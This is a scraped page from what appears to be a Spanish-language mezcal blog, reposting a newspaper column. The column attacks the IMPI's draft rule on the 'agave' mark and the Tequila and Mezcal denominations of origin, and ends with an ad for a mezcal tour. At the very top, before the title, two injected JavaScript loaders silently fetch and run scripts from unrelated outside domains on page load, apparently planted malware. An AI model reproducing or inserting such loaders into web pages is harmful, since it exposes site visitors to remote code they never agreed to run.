;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 101. Pifias del IMPI

101. Pifias del IMPI


El 13 de octubre el Instituto Mexicano de la Propiedad Industrial (IMPI) presentó el proyecto “Declaratoria por la que se regula el uso de la marca agave en tequila, mezcal y bacanora”. El texto, entre otras lindezas, plantea que “debido al prestigio de las Denominaciones de Origen Tequila, Mezcal y Bacanora, se ha generado una cantidad significativa de productos que buscan distorsionar el mercado de dichas Denominaciones de Origen, a través del aprovechamiento o la asociación del prestigio de los productos amparados por ellas, lo que ha propiciado confusión en el consumidor y una competencia desleal por parte de productores de otras bebidas alcohólicas”.
Las Denominaciones de Origen (DO) Tequila y Mezcal (Bacanora está en veremos) son un fraude, pues inducen la adulteración al permitir usar azúcares diferentes a los del agave hasta en un 49 y un 40% respectivamente. Además, las regiones que delimitan no tienen coherencia geográfica, por lo que hacen trizas el concepto DO. Si el IMPI toma el caso seriamente, debe someter a revisión estricta y pública estas DO y modificarlas a sólo 100% agave, y limitarlas a territorios geográficos coherentes para generar así DO Controladas (DOC). La DO Tequila es de risa, pues dice que se hace en todo Jalisco y 4 estados más, cuando sólo se ha hecho en una región delimitada de Jalisco.
Debe corregirse también la violación de garantías constitucionales y de derechos culturales de los productores y habitantes de las zonas mezcaleras que fueron excluidas con la emisión de la DO Mezcal, y partir de la idea de que estas bebidas son parte de nuestro Patrimonio Cultural.
Quien desee conocer una región mezcalera geográficamente coherente, vaya al Tour Mezcalero a Santa Catarina Minas, Oaxaca, del 19 al 21 de noviembre. Tiene un costo de $2500 e incluye transporte, hospedaje, visita a la magueyera, a la fábrica de mezcal, degustación de mezcales y comida regional, entre otras actividades. Mayores informes: cel. 55 3697 9508 o karina_lues@yahoo.com.mx.

http://impreso.milenio.com/node/9060819

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *